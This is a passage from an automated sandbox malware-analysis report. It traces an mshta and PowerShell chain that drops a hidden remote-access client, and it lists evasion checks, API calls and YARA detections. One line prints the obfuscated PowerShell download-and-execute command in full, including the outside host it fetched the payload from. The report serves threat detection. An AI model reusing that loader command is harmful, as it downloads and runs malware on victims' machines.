                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                                  Malware Analysis System Evasion

                                  barindex
                                  Delayed program exit found
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_110B8200 Sleep,ExitProcess,21_2_110B8200
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1038Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8835Jump to behavior
                                  Source: C:\Windows\System32\conhost.exeWindow / User API: threadDelayed 459Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\bpsFyf\remcmdstub.exeJump to dropped file
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\bpsFyf\TCCTL32.DLLJump to dropped file
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDropped PE file which has not been started: C:\Users\user\AppData\Roaming\bpsFyf\HTCTL32.DLLJump to dropped file
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeEvaded block: after key decisiongraph_21-65689
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeEvaded block: after key decisiongraph_21-69719
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeEvaded block: after key decisiongraph_21-69974
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeEvaded block: after key decisiongraph_21-69934
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_21-70059
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_21-66218
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeAPI coverage: 5.5 %
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8100Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeLast function: Thread delayed
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,21_2_1102D330
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,21_2_11065890
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,21_2_1106A0A0
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,21_2_111266E0
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFEB7112610 GetSystemInfo,12_2_00007FFEB7112610
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                                  Source: client32.exe, 00000015.00000003.1980133630.0000000006157000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000015.00000003.2279010250.0000000006141000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000015.00000003.1981222393.0000000006141000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW5
                                  Source: HTCTL32.DLL.12.drBinary or memory string: VMware
                                  Source: HTCTL32.DLL.12.drBinary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
                                  Source: TCCTL32.DLL.12.drBinary or memory string: skt%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlTCREMOTETCBRIDGE%s=%s
                                  Source: mshta.exe, 0000000B.00000003.1757222957.00000254956DC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1754052236.00000254956D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1754052236.0000025495632000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000015.00000002.2417429700.0000000006110000.00000004.00000020.00020000.00000000.sdmp, client32.exe, 00000015.00000002.2407434986.000000000135E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                  Source: HTCTL32.DLL.12.drBinary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
                                  Source: TCCTL32.DLL.12.drBinary or memory string: VMWare
                                  Source: mshta.exe, 0000000B.00000002.1764062895.0000025495683000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000B.00000003.1754052236.0000025495669000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW/CQ
                                  Source: mshta.exe, 0000000B.00000003.1755200295.0000025C982C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: _NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                                  Source: client32.exe, 00000015.00000002.2427569432.000000006C640000.00000002.00000001.01000000.00000013.sdmpBinary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cladl*
                                  Source: powershell.exe, 0000000C.00000002.2019703898.000002F279FDA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeAPI call chain: ExitProcess graph end nodegraph_21-65757
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_11161D01 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_11161D01
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_11147750 GetLastError,wsprintfA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,SetLastError,GetKeyState,21_2_11147750
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_11029590 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,21_2_11029590
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_1108BF30 GetTokenInformation,GetTokenInformation,GetProcessHeap,HeapAlloc,GetTokenInformation,IsValidSid,GetLengthSid,GetProcessHeap,HeapAlloc,CopySid,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,21_2_1108BF30
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_11093080 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,21_2_11093080
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_110310C0 _NSMClient32@8,SetUnhandledExceptionFilter,21_2_110310C0
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_11161D01 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_11161D01
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_1116DD89 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_1116DD89

                                  HIPS / PFW / Operating System Protection Evasion

                                  barindex
                                  Yara detected Powershell download and execute
                                  Source: Yara matchFile source: amsi64_7944.amsi.csv, type: OTHER
                                  Source: Yara matchFile source: Process Memory Space: mshta.exe PID: 7848, type: MEMORYSTR
                                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7944, type: MEMORYSTR
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_110F4560 GetTickCount,LogonUserA,GetTickCount,GetLastError,21_2_110F4560
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_1111FCA0 GetForegroundWindow,GetClassNameA,GetWindowTextA,keybd_event,keybd_event,keybd_event,21_2_1111FCA0
                                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='(New-Object Net.We'; $c4='bClient).Downlo'; $c3='adString(''http://traversecityspringbreak.com/o/o.png'')';$TC=I`E`X ($c1,$c4,$c3 -Join '')|I`E`X Jump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdnsJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c attrib +h C:\Users\user\AppData\Roaming\bpsFyfJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\bpsFyf\client32.exe "C:\Users\user\AppData\Roaming\bpsFyf\client32.exe" Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h C:\Users\user\AppData\Roaming\bpsFyfJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_1109E190 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,21_2_1109E190
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_1109E910 GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,21_2_1109E910
                                  Source: client32.exe, 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmp, PCICL32.DLL.12.drBinary or memory string: Shell_TrayWndunhandled plugin data, id=%d
                                  Source: client32.exe, client32.exe, 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmp, PCICL32.DLL.12.drBinary or memory string: Shell_TrayWnd
                                  Source: client32.exe, client32.exe, 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmp, PCICL32.DLL.12.drBinary or memory string: Progman
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,21_2_11173A35
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,21_2_11173D69
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,21_2_11173CC6
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: GetLocaleInfoA,21_2_1116B38E
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,21_2_11173933
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,21_2_111739DA
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,21_2_1117383E
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,21_2_11173D2D
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,21_2_11173C06
                                  Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\mshta.exeQueries volume information: C:\Windows\Fonts\times.ttf VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_110F33F0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeA,GetLastError,Sleep,CreateNamedPipeA,LocalFree,21_2_110F33F0
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_11177075 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,21_2_11177075
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_1103B160 SHGetFolderPathA,GetUserNameA,DeleteFileA,_sprintf,_fputs,_free,GetFileAttributesA,SetFileAttributesA,21_2_1103B160
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_11174AE9 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,21_2_11174AE9
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_111450A0 wsprintfA,GetVersionExA,RegOpenKeyExA,_memset,_strncpy,RegCloseKey,21_2_111450A0
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_11070090 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,21_2_11070090
                                  Source: C:\Users\user\AppData\Roaming\bpsFyf\client32.exeCode function: 21_2_110D8200 __CxxThrowException@8,gethostbyname,WSAGetLastError,_memmove,htons,socket,WSAGetLastError,#21,bind,WSAGetLastError,listen,WSAGetLastError,accept,WSAGetLastError,21_2_110D8200
                                  Source: Yara matchFile source: 21.2.client32.exe.73d70000.5.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 21.0.client32.exe.d10000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 21.2.client32.exe.73d50000.4.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 21.2.client32.exe.111b79e0.1.raw.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 21.2.client32.exe.6c600000.2.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 21.2.client32.exe.11000000.0.unpack, type: UNPACKEDPE
                                  Source: Yara matchFile source: 00000015.00000002.2427569432.000000006C640000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000015.00000002.2405808800.0000000000D12000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000015.00000000.1975726137.0000000000D12000.00000002.00000001.01000000.0000000E.sdmp, type: MEMORY
                                  Source: Yara matchFile source: 00000015.00000002.2422619093.0000000011193000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
